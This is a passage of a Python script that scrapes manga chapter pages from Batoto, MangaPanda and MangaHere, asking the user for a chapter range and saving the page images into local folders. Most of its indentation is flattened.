print('Invalid choice!')
print()
if search_found_bool:
break
if search_quit_bool:
break
if search_found_bool:
#At this point the index has been found for the manga name and link
# In the search list letters list!!!
break
else:
#Reset Settings
search_list_letters = []
search_list_letter_links = []
search_found_bool = False
search_quit_bool = False
search_int = 0
print('For some reason your search didn\'t work.')
print('You will now have to try again, sorry!')
#If found succesful break here
elif search_input == 'quit':
#Dont break just loop back to the main choices again
pass
else:
print()
print('Invalid option!')
else:
print('Invalid option!')
link_to_return = search_list_letter_links[search_int]
return link_to_return
def Batoto():
success = False
Search_feature = False
currentDirectory = os.getcwd()
if platformType == 'Windows':
Search_feature_directory = currentDirectory + '\\Manga_Names_And_Links\\'
else:
Search_feature_directory = currentDirectory + '/Manga_Names_And_Links/'
Search_feature = os.path.isfile(Search_feature_directory + 'Manga_Database.txt')
currentDirectory = os.getcwd()
if platformType == 'Windows':
MASTERdirectoryName = currentDirectory + "\\Batoto"
else:
MASTERdirectoryName = currentDirectory + "/Batoto"
try:
os.makedirs(MASTERdirectoryName)
except OSError:
if not os.path.isdir(MASTERdirectoryName):
raise
#MASTERdirectoryName is the Variable that will keep the program downloading
#Different Manga to the same Batoto Folder
os.chdir(MASTERdirectoryName)
while success == False:
downloadManga = False
if Search_feature:
while True:
search_url = Search_Feature(1, Search_feature_directory)
try:
urllibHTML = urllib.request.urlopen(search_url).read()
downloadManga = True
break
except:
print()
print('Invalid URL!')
print('Please Try Again')
else:
print('The URL you are to input below should be the top level page of the')
print('manga you wish to download')
print('Ex: http://bato.to/comic/_/comics/seto-no-hanayome-r385 ')
print()
while True:
print('Please enter the url of the manga you wish to download (or q to quit): ')
urlRequest = input('')
print('\n')
if urlRequest == 'q':
return
try:
urllibHTML = urllib.request.urlopen(urlRequest).read()
downloadManga = True
break
except:
print()
print('Invalid URL!')
type_one_manga = False
type_two_manga = False
if downloadManga == True:
Manga_Title = re.findall(r'<title>+(.*?)- Scanlations', str(urllibHTML))
if len(Manga_Title) == 0:
print("Title not found. URL or HTML Error.")
break
Manga_Title_string = Manga_Title[0]
Manga_Title_string = Manga_Title_string[:-1]
Manga_Title_string = re.sub(r'\\x\w{2}', r' ', Manga_Title_string)
#Python 3.4 Converts '&' Type things to their string equivelant.
Manga_Title_string = html.unescape(Manga_Title_string)
#Get rid of Non-Functioning characters for Filenames
directorySafeName = Manga_Title_string
directorySafeName = directorySafeName.replace("/", " over ")
directorySafeName = directorySafeName.replace(":", "")
directorySafeName = directorySafeName.replace("?", "")
directorySafeName = directorySafeName.replace("+", " plus ")
directorySafeName = directorySafeName.replace("\"","'")
directorySafeName = directorySafeName.replace("%", " Percent ")
directorySafeName = directorySafeName.replace("<", "")
directorySafeName = directorySafeName.replace(">", "")
Manga_Title_string = directorySafeName
#For any other language on Bato.to change lang_English to whatever matches the language you desire.
            #Then this file *SHOULD* work with your language. It is untested with anything other than English.
allENGLISHChaps = re.findall(r'lang_English+(.*?)\ title="+', str(urllibHTML))
if len(allENGLISHChaps) == 0:
print("Manga has no English Chapters or there was an error reading the HTML!")
else:
First_chapter_string = allENGLISHChaps[-1]
First_chapter_address = re.findall(r'href=\"+(.*?)\"', First_chapter_string)
First_chapter_address_string = First_chapter_address[0]
try:
First_chapter_html = urllib.request.urlopen(First_chapter_address_string).read()
except:
print()
print('Trouble Opening Webpage!')
downloadManga = False
if downloadManga == True:
#Find which type of manga this manga is. Whether all pages of the chapter are on one page or multiple pages.
type_one_padding_right = re.search("<div style=\"text-align:center;\">", str(First_chapter_html))
type_two_comic_page = re.search("comic_page", str(First_chapter_html))
#Type one is All images on One Page
if type_one_padding_right != None:
type_one_manga = True
#Type two is All images on seperate pages
elif type_two_comic_page != None:
type_two_manga = True
else:
print("There was an error with the Manga Type!")
return
#This will get the chapter links from the Select options on the chapters first page
                #There are 2 select options (one at the top and one at the bottom).
                #They are the same, so it's arbitrary which one you pick. I will be selecting [0].
get_Chapters = re.findall(r'250px;">+(.*?)</select>', str(First_chapter_html))
chapter_master_string = get_Chapters[0]
list_of_Chapter_Links = []
#Get all chapter links. Last thing in list is an unneeded "selected" string. Pop that off.
list_of_Chapter_Links = re.findall(r'\"+(.*?)\"', chapter_master_string)
#In this list there may be a "selected". It may or may not be at the end. The loop solves it.
#I am 95% sure there will only ever be 1 "selected" per list.
#list_of_Chapter_Links.pop(-1)
for i in range(len(list_of_Chapter_Links)):
if list_of_Chapter_Links[i] == "selected":
list_of_Chapter_Links.pop(i)
break
#Get Numbers of the chapters. Will be "Matched" up to the list_of_Chapter_Links.
list_of_Chapter_Numbers_raw = re.findall(r'Ch\.+(.*?)<', chapter_master_string)
list_of_chapter_names_refined = []
#Some chapters may be like "230: Title of Chapter" Some may be "145"
for i in range(len(list_of_Chapter_Numbers_raw)):
temp_list = re.findall('^(.*?):', list_of_Chapter_Numbers_raw[i])
if len(temp_list) == 0:
list_of_chapter_names_refined.append(list_of_Chapter_Numbers_raw[i])
elif len(temp_list) == 1:
list_of_chapter_names_refined.append(temp_list[0])
else:
print("Manga Chapter Name Error!")
return
# list_of_Chapter_Links Has Links -Has Duplicates at this point
# list_of_chapter_names_refined Has Names -Has Duplicates at this point
#
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# This Comment Block is what remains of a method to delete repeated chapters
# Due to some Manga Chapter names and Chapter Quality it has (as of 7/2/15) become
# very difficult to keep duplicate chapters out without some problems arising.
# This Code shall be kept here so in the future if a more effective way to
                # delete duplicates while keeping originals/good-quality chapters becomes apparent
# we can reimplement this feature.
#
#list_of_Chapter_Links_Final = []
#list_of_Chapter_Numbers_Final = []
#for i in range(len(list_of_chapter_names_refined)):
# if list_of_chapter_names_refined[i] in list_of_Chapter_Numbers_Final:
# pass
# else:
# list_of_Chapter_Numbers_Final.append(list_of_chapter_names_refined[i])
# list_of_Chapter_Links_Final.append(list_of_Chapter_Links[i])
list_of_Chapter_Links_Final = list_of_Chapter_Links
list_of_Chapter_Numbers_Final = list_of_chapter_names_refined
list_of_Chapter_Links_Final.reverse()
list_of_Chapter_Numbers_Final.reverse()
can_be_sorted = True
                #Check whether every chapter number parses as a float, so the chapters can be sorted.
                #If not, only a full download is offered for this manga: with chapters that are
                # wildly out of order and not plain numbers, offering a start/end chapter
                # selection has proven very difficult.
for i in range(len(list_of_Chapter_Numbers_Final)):
try:
float(list_of_Chapter_Numbers_Final[i])
except ValueError:
print('Sorry, this manga can\'t be sorted.')
print('You can only do a full download.')
print('\n')
can_be_sorted = False
break
fullDownload = False
chapter_found = False
custom_start = False
custom_end = False
chapter_to_start_from = ''
place_to_start_from_index = 0
chapter_to_end_at = ''
place_to_end_at_index = 0
if can_be_sorted:
#Selection Sort. Efficiency isn't needed here, all manga on bato.to should be below 1500 chapters.
#What's needed is to keep 'list_of_Chapter_Numbers_Final' and 'list_of_Chapter_Links_Final' together/one-to-one.
#Meaning the chapter at list_of_Chapter_Numbers_Final[i] has the link at list_of_Chapter_Links_Final[i]
for i in range(len(list_of_Chapter_Numbers_Final)):
current = i
for k in range(i+1, len(list_of_Chapter_Numbers_Final)):
if float(list_of_Chapter_Numbers_Final[k]) < float(list_of_Chapter_Numbers_Final[current]):
current = k
list_of_Chapter_Numbers_Final[i], list_of_Chapter_Numbers_Final[current] = list_of_Chapter_Numbers_Final[current], list_of_Chapter_Numbers_Final[i]
list_of_Chapter_Links_Final[i], list_of_Chapter_Links_Final[current] = list_of_Chapter_Links_Final[current], list_of_Chapter_Links_Final[i]
while 1:
print('Do you wish to download the entire manga? [y/n], [l] to list out the chapters, or [q] to quit.')
continueChoiceFullDownload = input('')
print('\n')
if continueChoiceFullDownload == 'l':
for k in range(len(list_of_Chapter_Numbers_Final)):
print(repr(list_of_Chapter_Numbers_Final[k]).ljust(20), end='')
if (k % 3) == 2:
print('\n', end='')
print('', end='\n')
print('', end='\n')
elif continueChoiceFullDownload == 'y':
fullDownload = True
break
elif continueChoiceFullDownload == 'n':
while 1:
print('Do you wish to start download from a certain chapter? [y/n], [l] to list out the chapters, or [q] to quit.')
print('By Choosing no the entire manga will download')
continueChoiceCustomChap = input('')
print('\n')
if continueChoiceCustomChap == 'l':
for k in range(len(list_of_Chapter_Numbers_Final)):
print(repr(list_of_Chapter_Numbers_Final[k]).ljust(20), end='')
if (k % 3) == 2:
print('\n', end='')
print('', end='\n')
print('', end='\n')
elif continueChoiceCustomChap == 'y':
print('Please enter the chapter you wish to start from')
chapNum = input('')
print('\n')
for i in range(len(list_of_Chapter_Numbers_Final)):
if chapNum == list_of_Chapter_Numbers_Final[i]:
chapter_found = True
custom_start = True
chapter_to_start_from = list_of_Chapter_Numbers_Final[i]
place_to_start_from_index = i
break
if chapter_found == False:
print('Invalid chapter number! Maybe the chapter is missing?')
print()
else:
print('Chapter Found!')
print('\n')
#May use chapter_found again for the end point
chapter_found = False
break
elif continueChoiceCustomChap == 'n':
fullDownload = True
break
elif continueChoiceCustomChap == 'q':
return
else:
print('Invalid Option!')
print()
if fullDownload == False:
while 1:
print('Do you wish to end the download at a certain chapter?[y/n], [l] to list out the chapters, or [q] to quit.')
print('By Choosing no the entire manga will download from the start location')
continueChoiceCustomChap = input('')
print('\n')
if continueChoiceCustomChap == 'l':
for k in range(len(list_of_Chapter_Numbers_Final)):
print(repr(list_of_Chapter_Numbers_Final[k]).ljust(20), end='')
if (k % 3) == 2:
print('\n', end='')
print('', end='\n')
print('', end='\n')
elif continueChoiceCustomChap == 'y':
print('Please enter the chapter you wish to end at')
chapNum = input('')
print('\n')
temp_bool = True
for i in range(len(list_of_Chapter_Numbers_Final)):
if chapNum == list_of_Chapter_Numbers_Final[i]:
#not working
if i < place_to_start_from_index:
print('Sorry, Number must be greater than or equal to the Start chapter, which is:', chapter_to_start_from)
print('Invalid Option!')
print()
temp_bool = False
break
else:
chapter_found = True
custom_end = True
temp_bool = True
chapter_to_end_at = list_of_Chapter_Numbers_Final[i]
place_to_end_at_index = i
#This loop is to make sure all duplicates are included
#in the chapter list
for k in range(place_to_end_at_index, len(list_of_Chapter_Numbers_Final)):
if chapNum == list_of_Chapter_Numbers_Final[k]:
place_to_end_at_index = k
break
if temp_bool == True:
if chapter_found == False:
print('Invalid chapter number! Maybe the chapter is missing?')
print()
else:
print('Chapter Found!')
print('\n')
break
elif continueChoiceCustomChap == 'n':
break
elif continueChoiceCustomChap == 'q':
return
else:
print('Invalid Option!')
print()
#At the end of the Main elif choice == no
break
elif continueChoiceFullDownload == 'q':
return
else:
print('Invalid Option!')
else:
fullDownload = True
print('Do you want to quit the program before downloading')
print('the entire manga? [y/n]')
while True:
quit_or_not = input()
quit_or_not = quit_or_not.lower()
if quit_or_not == 'y':
return
elif quit_or_not == 'n':
break
else:
print('Invalid input! Do you want to quit? [y/n]')
#For Reference:
#If fullDownload = True
#The user wants to download From chapter 1 to the end (Whatever is available)
#If custom_start = True Than fullDownload == False
#The user wants to download from The start chapter which was Found and stored in chapter_to_start_from
        #Does not need custom_end to be True. If it isn't, then it will download until the end of the manga
#If custom_end = True Than custom_start == True AND fullDownload == False
#The user wants to download from The start chapter which was Found and stored in chapter_to_start_from
#The user also wants to download until an end chapter which was Found and stored in chapter_to_end_at
#This if, elif, and elif are to set which chapters are to be downloaded.
if fullDownload == True:
pass
#If you only have a start location, pop off chapter numbers/links until you hit that chapter
elif custom_start == True and custom_end == False:
for i in range(place_to_start_from_index):
list_of_Chapter_Links_Final.pop(0)
list_of_Chapter_Numbers_Final.pop(0)
        #Do the same as before, but the end must be popped off as well:
        #drop every chapter after the chosen end chapter from the tail of the lists.
elif custom_start == True and custom_end == True:
for i in range(place_to_start_from_index):
list_of_Chapter_Links_Final.pop(0)
list_of_Chapter_Numbers_Final.pop(0)
for i in range(len(list_of_Chapter_Links_Final)-(int(place_to_end_at_index)-int(place_to_start_from_index))-1):
list_of_Chapter_Links_Final.pop(-1)
list_of_Chapter_Numbers_Final.pop(-1)
else:
print('Fatal error with the start selection')
return
#Because there are duplicates I must check and add a v2 or v3 if it is in there more times
temp_name = []
temp_name_str = ''
for i in range(len(list_of_Chapter_Numbers_Final)):
if list_of_Chapter_Numbers_Final[i] in temp_name:
#At this point there are duplicates. The chapters may not be in order.
#This is the only method I can come up with to deal with duplicates
# that may be out of order.
                #Try ' v2', ' v3', ... up to ' v10' until an unused name is found
                for version in range(2, 11):
                    temp_name_str = list_of_Chapter_Numbers_Final[i] + ' v' + str(version)
                    if temp_name_str not in temp_name:
                        break
                #If there are more than 10 duplicates I can't help you
temp_name.append(temp_name_str)
else:
temp_name.append(list_of_Chapter_Numbers_Final[i])
list_of_Chapter_Numbers_Final = temp_name
currentDirectory = MASTERdirectoryName
if platformType == 'Windows':
manga_directory_name = currentDirectory + "\\" + Manga_Title_string
else:
manga_directory_name = currentDirectory + "/" + Manga_Title_string
try:
os.makedirs(manga_directory_name)
except OSError:
if not os.path.isdir(manga_directory_name):
raise
os.chdir(manga_directory_name)
#Main Loop for Downloading Images.
if fullDownload == True or custom_start == True:
for i in range(len(list_of_Chapter_Numbers_Final)):
first_page_of_each_chapter = True
chapter_number = list_of_Chapter_Numbers_Final[i]
chapter_link = list_of_Chapter_Links_Final[i]
if platformType == 'Windows':
chapDirectoryName = manga_directory_name + "\\Chapter " + chapter_number
else:
chapDirectoryName = manga_directory_name + "/Chapter " + chapter_number
try:
os.makedirs(chapDirectoryName)
except OSError:
if not os.path.isdir(chapDirectoryName):
raise
os.chdir(chapDirectoryName)
print("Downloading Chapter", chapter_number)
urllibHTML = urllib.request.urlopen(list_of_Chapter_Links_Final[i]).read()
if type_one_manga == True:
get_images = re.findall(r'text-align:center;">+(.*?)</div><div', str(urllibHTML))
get_images_master_string = get_images[0]
image_file_name_list = re.findall(r"<img src=\\'(.*?)\\'", str(get_images_master_string))
Amount_of_pages = len(image_file_name_list)
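                    #On the first pass, skip the chapter if its folder already holds one file per page (simple resume support)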
for j in range(len(image_file_name_list)):
if first_page_of_each_chapter == True:
first_page_of_each_chapter = False
numOfFileInCWD = len([name for name in os.listdir('.') if os.path.isfile(name)])
if numOfFileInCWD == Amount_of_pages:
break
image_file_name = image_file_name_list[j]
image_file_extension_list = re.findall(r'(\.\D[^\.]+)', image_file_name)
image_file_extension = image_file_extension_list[-1]
imageName = "Page " + str(j+1) + image_file_extension
print("Downloading Page %d" % (j+1), end="", flush=True)
print("\r", end="", flush=True)
fileExists = os.path.isfile(imageName)
#If file does not already exist, opens a file, writes image binary data to it and closes
if fileExists == False:
try:
rawImage = urllib.request.urlopen(image_file_name).read()
fout = open(imageName, 'wb')
fout.write(rawImage)
fout.close()
except:
print(' ')
print("Image download Error!")
print('Chapter ' + str(chapter_number) + ' Page ' + str(j+1) + ' Cannot be downloaded.')
elif type_two_manga == True:
#Get the pages between "<id..." and "</se..."
get_Pages = re.findall(r'id="page_select" onchange="window.location=this.value;">+(.*?)</select></li>', str(urllibHTML))
#There will be Two found
Pages_master_string = get_Pages[0]
                    #Get all page links. The list also contains an unneeded "selected" entry; the loop below removes it.
list_of_page_Links = re.findall(r'\"+(.*?)\"', Pages_master_string)
list_of_page_links_final = []
                    #Loop to get rid of the "selected" part of the list
for j in range(len(list_of_page_Links)):
if list_of_page_Links[j] != "selected":
list_of_page_links_final.append(list_of_page_Links[j])
Amount_of_pages = len(list_of_page_links_final)
for j in range(len(list_of_page_links_final)):
try:
print("Downloading Page %d" % (j+1), end="", flush=True)
print("\r", end="", flush=True)
#Check for First page. Checks to see if anything is already downloaded
if first_page_of_each_chapter == True:
first_page_of_each_chapter = False
numOfFileInCWD = len([name for name in os.listdir('.') if os.path.isfile(name)])
if numOfFileInCWD == Amount_of_pages:
break
#At this point There will be something you need to download.
#Since we already have the HTML for the first page of EACH Chapter
#We dont need to waste time to read that again, set it here.
page_urllibHTML = urllibHTML
else:
page_urllibHTML = urllib.request.urlopen(list_of_page_links_final[j]).read()
#Get Image URL
image_file_name_list = re.findall(r'comic_page" style="max-width: 100%;" src="(.*?)"', str(page_urllibHTML))
image_file_name = image_file_name_list[0]
#CHECK EXTENSION. Bato.to Could use .png or .jpg or .jpeg
image_file_extension_list = re.findall(r'(\.\D[^\.]+)', image_file_name)
image_file_extension = image_file_extension_list[-1]
imageName = "Page " + str(j+1) + image_file_extension
fileExists = os.path.isfile(imageName)
#If file does not already exist, opens a file, writes image binary data to it and closes
if fileExists == False:
try:
rawImage = urllib.request.urlopen(image_file_name).read()
fout = open(imageName, 'wb')
fout.write(rawImage)
fout.close()
except:
print(' ')
print("Image download Error!")
print('Chapter ' + str(chapter_number) + ' Page ' + str(j+1) + ' Cannot be downloaded.')
except:
print("Invalid URL Error, or Connection Timeout!")
return
else:
print("Manga Type Error!")
return
while 1:
print('\n')
print('Do you wish to download another manga?[y/n]')
continueChoice = input('')
if continueChoice == 'y':
break
elif continueChoice == 'n':
success = True
break
else:
print('Invalid Option!')
#Main While Loop
#Download Manga If statement
#English chapters > 0
#Download manga Main statement where everything is performed in
return
def MangaPanda():
success = False
currentDirectory = os.getcwd()
downloadMangaListOnce = False
searchAgain = False
if platformType == 'Windows':
Search_feature_directory = currentDirectory + '\\Manga_Names_And_Links\\'
else:
Search_feature_directory = currentDirectory + '/Manga_Names_And_Links/'
Search_feature = os.path.isfile(Search_feature_directory + 'Manga_Database.txt')
while success == False:
downloadManga = True
if Search_feature:
search_url = Search_Feature(2, Search_feature_directory)
link_or_not = re.findall(r'(mangapanda.com)', search_url)
if len(link_or_not) == 0:
urlRequest = 'http://www.mangapanda.com' + search_url
else:
urlRequest = search_url
else:
print('The URL you are to input below should be the top level page of the')
print('manga you wish to download')
print('Ex: http://www.mangapanda.com/372/seto-no-hanayome.html ')
print('Please enter the url of the manga you wish to download (or q to quit): ')
urlRequest = input('')
print('\n')
#take the URL the user gave and cut off last five characters (.html)
try:
does_it_have_dot_html = re.findall(r'(\.html)', urlRequest)
if len(does_it_have_dot_html) == 0:
pass
else:
urlRequest = urlRequest[:-5]
urllibHTML = urllib.request.urlopen(urlRequest).read()
except:
print()
print('Invalid URL or connection timeout.')
downloadManga = False
#links to chapters on mangapanda are identified by the class 'chico_manga'
if downloadManga == True:
allChaps = re.findall(r'<div class="chico_manga"></div>\\n<a href="+(.*?)\">+', str(urllibHTML))
numOfChapLinks = len(allChaps)
#However the 6 most recent chapters are also under the 'chico_manga' class
#so it is necessary to pop those chapters off and if there are not a total
#of 6 chapters in the manga we have special cases
if numOfChapLinks < 12:
if numOfChapLinks == 10:
for i in range(5):
allChaps.pop(0)
elif numOfChapLinks == 8:
for i in range(4):
allChaps.pop(0)
elif numOfChapLinks == 6:
for i in range(3):
allChaps.pop(0)
elif numOfChapLinks == 4:
for i in range(2):
allChaps.pop(0)
elif numOfChapLinks == 2:
allChaps.pop(0)
else:
print('There was an error parsing the HTML!')
else:
for i in range(6):
allChaps.pop(0)
#Rather conveniently, there is a class called 'aname' which contains the name of the manga
grabName = re.findall(r'<h2 class="aname">+(.*?)\</h2>+', str(urllibHTML))
#some mangas contained characters in aname which cannot be used in windows directories
#these statements attempt to make said strings directory friendly
directorySafeName = grabName[0]
directorySafeName = directorySafeName.replace("/", " over ")
directorySafeName = directorySafeName.replace(":", "")
directorySafeName = directorySafeName.replace("?", "")
directorySafeName = directorySafeName.replace("+", "")
directorySafeName = directorySafeName.replace("\"","'")
directorySafeName = directorySafeName.replace("%", " Percent")
directorySafeName = directorySafeName.replace("<", "")
directorySafeName = directorySafeName.replace(">", "")
#since Windows and UNIX platforms use different directory syntax we need to know the platform
#and adjust accordingly
if platformType == 'Windows':
directoryName = currentDirectory + "\\MangaPanda\\" + str(directorySafeName)
else:
directoryName = currentDirectory + "/MangaPanda/" + str(directorySafeName)
try:
os.makedirs(directoryName)
except OSError:
if not os.path.isdir(directoryName):
raise
os.chdir(directoryName)
#loops chapter URLs to determine chapter number for both types of URLs
chapterNames = []
for i in range(len(allChaps)):
chapterNum = re.findall('((?:\d)+)', allChaps[i])
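                #the last run of digits in the chapter URL is taken as the chapter number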
chapterNames.append(chapterNum[-1])
fullDownload = False
while 1:
customStart = False
customEnd = False
chapterFound = False
restartMenu = False
singleChapter = False
startLocation = 0
endLocation = 0
#asks the user if they want to download all the manga or start from a certain chapter
print('Do you wish to download the entire manga?[y/n]')
continueChoiceFullDownload = input('')
print()
if continueChoiceFullDownload == 'y':
fullDownload = True
break
elif continueChoiceFullDownload == 'n':
while 1:
print('Do you wish to start downloading from a certain chapter?[y/n]')
continueChoiceCustomChap = input('')
print()
if continueChoiceCustomChap == 'y':
print('Please enter the chapter you wish to start from.')
startChap = input('')
print()
for i in range(len(chapterNames)):
if startChap == chapterNames[i]:
chapterFound = True
customStart = True
startLocation = i
break
#this else is connected with the if in the for loop. If the for loop goes through all of its iterations
#and the if statement is never tripped then this else is tripped
else:
print("Invalid chapter number! Maybe the chapter is missing?")
print()
break
if chapterFound == True:
chapterFound = False
break
elif continueChoiceCustomChap == 'n':
restartMenu = True
break
elif continueChoiceCustomChap == 'q':
return
else:
print('Invalid Option!')
print()
elif continueChoiceFullDownload == 'q':
return
else:
print('Invalid Option!')
print()
if restartMenu == True:
break
if customStart == True:
break
#Inquires the user where they wish to end. If they do not specify the program will run to the last chapter
if fullDownload == False and restartMenu == False:
while 1:
print('Do you wish to end the download at a certain chapter?[y/n]')
print('Making the end location the same as the start location will download')
print('only that chapter')
print('Choosing [n]o will download the entire manga starting from the location')
print('you chose above')
continueChoiceCustomChap = input('')
print()
if continueChoiceCustomChap == 'y':
print('Please enter the chapter you wish to end at.')
endChap = input('')
print()
if int(endChap) < int(startChap):
print('Invalid chapter number! Your end chapter cannot be before the start!')
print()
else:
for i in range(len(chapterNames)):
if endChap == chapterNames[i]:
chapterFound = True
customEnd = True
endLocation = i
break
else:
print('Invalid chapter number! Maybe the chapter is missing?')
print()
if chapterFound == True:
break
elif continueChoiceCustomChap == 'n':
break
elif continueChoiceCustomChap == 'q':
return
else:
print('Invalid Option!')
print()
            #once we know which chapters the user wants to download, the program modifies the chapter
            #lists that will be passed to the main for-loop to download the chapters off MangaPanda
if customStart == True and customEnd == False:
for i in range(startLocation):
allChaps.pop(0)
chapterNames.pop(0)
elif customStart == True and customEnd == True:
for i in range(startLocation):
allChaps.pop(0)
chapterNames.pop(0)
for i in range(len(allChaps)-(int(endLocation)-int(startLocation))-1):
allChaps.pop(-1)
chapterNames.pop(-1)
if fullDownload == True or customStart == True:
for i in range(len(allChaps)):
if platformType == 'Windows':
chapDirectoryName = directoryName + "\\Chapter " + str(chapterNames[i])
else:
chapDirectoryName = directoryName + "/Chapter " + str(chapterNames[i])
try:
os.makedirs(chapDirectoryName)
except OSError:
if not os.path.isdir(chapDirectoryName):
raise
os.chdir(chapDirectoryName)
#There are some special cases associated with the first loop through the chapter
isFirstLoopPage = True
chapURL = "http://www.mangapanda.com" + allChaps[i]
print("Downloading Chapter", str(chapterNames[i]))
imageLocation = 0
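                #Step through the chapter one page at a time, following each page's 'next' link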
while 1:
imageLocation += 1
#Looks at page URLs for any and all sequences of numbers
nextChapDetermine = re.findall('((?:\d)+)', chapURL)
try:
urllibHTML = urllib.request.urlopen(chapURL).read()
except:
print('Chapter URL Error. Cannot download Further.')
return
if isFirstLoopPage == True:
determineAmountOfPages = re.findall('<option value="+(.*?)\</option>', str(urllibHTML))
if len(determineAmountOfPages) == imageLocation - 1:
break
#Checks the number of files in directory in comparison to the number of images in the chapter
#If the number is the same the assumption is made that all images have been downloaded
if isFirstLoopPage == True:
isFirstLoopPage = False
numOfFileInCWD = len([name for name in os.listdir('.') if os.path.isfile(name)])
if numOfFileInCWD == len(determineAmountOfPages):
break
#grabs both the next page URL and the URL for the image on the current page
URLandIMG = re.findall(r'<div id="imgholder">+(.*?)\" name=+', str(urllibHTML))
nextPageURL = re.findall(r'<a href="+(.*?)\">', URLandIMG[0])
imageURL = re.findall(r'src="+(.*?)\"', URLandIMG[0])
extensionForIMG = re.findall('\.\D[^\.]+', imageURL[0])
imageName = "Page " + str(imageLocation) + extensionForIMG[-1]
fileExists = os.path.isfile(imageName)
                    #Old code that would put each page that's currently downloading on a new line
                    #print("Downloading Page", imageLocation)
                    #New code that will overwrite each "Downloading Page #" with the next page
                    #and will eventually be overwritten by the "Downloading Chapter #"
print("Downloading Page %d" % imageLocation, end="", flush=True)
print("\r", end="", flush=True)
#If file does not already exist, opens a file, writes image binary data to it and closes
if fileExists == False:
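                        #Use a browser-style User-Agent header; the default urllib agent may be rejected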
user_agent = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7'
url = imageURL[0]
headers={'User-Agent':user_agent,}
request = urllib.request.Request(imageURL[0],None,headers)
try:
rawImage = urllib.request.urlopen(request).read()
fout = open(imageName, 'wb')
fout.write(rawImage)
fout.close()
except:
print(' ')
print("Image download Error!")
print('Chapter ' + str(chapterNames[i]) + ' Page ' + str(imageLocation) + ' Cannot be downloaded.')
chapURL = "http://www.mangapanda.com" + nextPageURL[0]
while 1:
print('Do you wish to download another manga?[y/n]')
continueChoice = input('')
print()
if continueChoice == 'y':
break
elif continueChoice == 'n':
success = True
break
elif continueChoice == 'q':
return
else:
print('Invalid Option!')
return
def MangaHere():
success = False
Search_feature = False
currentDirectory = os.getcwd()
if platformType == 'Windows':
Search_feature_directory = currentDirectory + '\\Manga_Names_And_Links\\'
else:
Search_feature_directory = currentDirectory + '/Manga_Names_And_Links/'
Search_feature = os.path.isfile(Search_feature_directory + 'Manga_Database.txt')
if platformType == 'Windows':
directoryName = currentDirectory + "\\MangaHere"
else:
directoryName = currentDirectory + "/MangaHere"
try:
os.makedirs(directoryName)
except OSError:
if not os.path.isdir(directoryName):
raise
os.chdir(directoryName)
#downloadMangaListOnce = False
downloadManga = False
while 1:
if Search_feature:
while True:
search_url = Search_Feature(3, Search_feature_directory)
try:
urllibHTML = urllib.request.urlopen(search_url).read()
downloadManga = True
break
except:
print()
print('Invalid URL or connection Timeout')
print('Please Try Again')
else:
print('The URL you are to input below should be the top level page of the')
print('manga you wish to download')
print('Ex: http://www.mangahere.co/manga/seto_no_hanayome/ ')
print()
while True:
print('Please enter the url of the manga you wish to download (or q to quit): ')
urlRequest = input('')
print('\n')
if urlRequest == 'q':
return
try:
urllibHTML = urllib.request.urlopen(urlRequest).read()
downloadManga = True
break
except:
print()
print('Invalid URL or connection Timeout')
if downloadManga == True:
allChaps = re.findall(r' <a class="color_0077" href="(.*?)"', str(urllibHTML))
allChaps.reverse()
numOfChapLinks = len(allChaps)
mangaName = re.findall(r' <h1 class="title"><span class="title_icon"></span>(.*?)</h1>', str(urllibHTML))
try:
directorySafeName = mangaName[0]
except:
print('Invalid URL!')
return
#Python 3.4 Converts '&' Type things to their string equivalent.
directorySafeName = html.unescape(directorySafeName)
#Get rid of Non-Functioning characters for Filenames
directorySafeName = directorySafeName.replace("/", " over ")
directorySafeName = directorySafeName.replace(":", "")
directorySafeName = directorySafeName.replace("?", "")
directorySafeName = directorySafeName.replace("+", " plus ")
directorySafeName = directorySafeName.replace("\"","'")
directorySafeName = directorySafeName.replace("%", " Percent ")
directorySafeName = directorySafeName.replace("<", "")
directorySafeName = directorySafeName.replace(">", "")
directorySafeName = re.sub(r'\\x\w{2}', r' ', directorySafeName)
directorySafeName = re.sub(r"\\'", r"'", directorySafeName)
directorySafeName = directorySafeName.title()
# Add in options here
search_found_bool = False
search_quit_bool = False
fullDownload = False
custom_start = False
custom_end = False
place_to_start_from_index = 0
place_to_end_at_index = 0
while True:
search_found_bool = False
search_quit_bool = False
fullDownload = False
custom_start = False
custom_end = False
place_to_start_from_index = 0
place_to_end_at_index = 0
print('Do you wish to download the entire manga? [y/n] or [q] to quit.')
continueChoiceFullDownload = input('')
print('\n')
if continueChoiceFullDownload == 'n':
print('Here is a list of the first 50 Chapters.')
print('Keep in mind you cannot go back')
print('\tYour options are:')
                    print('The number of the chapter you want to start at')
print('\'n\' for the next 50 chapters')
print('\'q\' to quit to the main menu\n')
for i in range(len(allChaps)):
#This code block is to extract the Vol and Chapter numbers
#From the URL. It is a pain but needed.
#This code block is also used later on.
skipBool1 = False
skipBool2 = False
volChapDirectoryString = ""
findVolume = re.findall(r'v\d{2}.\d+' , allChaps[i])
findChap = re.findall(r'c\d{3}.\d+' , allChaps[i])
if len(findVolume) == 0:
findVolume = re.findall(r'v\d{2}', allChaps[i])
try:
volTempString = re.findall(r'\d{2}', findVolume[0])
except:
skipBool1 = True
if skipBool1 == False:
volTempString = str(int(volTempString[0]))
volChapDirectoryString = volChapDirectoryString + 'Vol. ' + volTempString + ' '
else:
volTempString = re.findall(r'\d{2}.\d+', findVolume[-1])
volTempString = str(float(volTempString[0]))
volChapDirectoryString = volChapDirectoryString + 'Vol. ' + volTempString + ' '
if len(findChap) == 0:
findChap = re.findall(r'c\d{3}', allChaps[i])
try:
chapTempString = re.findall(r'\d{3}', findChap[0])
except:
skipBool2 = True
if skipBool2 == False:
chapTempString = str(int(chapTempString[0]))
volChapDirectoryString = volChapDirectoryString + 'Chap. ' + chapTempString
else:
chapTempString = re.findall(r'\d{3}.\d+', findChap[-1])
chapTempString = str(float(chapTempString[0]))
volChapDirectoryString = volChapDirectoryString + 'Chap. ' + chapTempString
if volChapDirectoryString == "":
                            print('An error has occurred getting chapter or volume number!')
return
#Plus one here So there will be a minus one later!!!
print('Number ' + str(i+1) + ' ' + volChapDirectoryString)
if i % 50 == 49 or (i == (len(allChaps) - 1)):
print('\nYour options are:')
print('The number of the manga you want')
print('\'n\' for the next 50 names')
print('\'q\' to quit to the main menu\n')
while True:
print('Choose:')
search_input = input('')
print('\n')
if search_input.isdigit():
if int(search_input) > 0 and int(search_input) <= len(allChaps):
custom_start = True
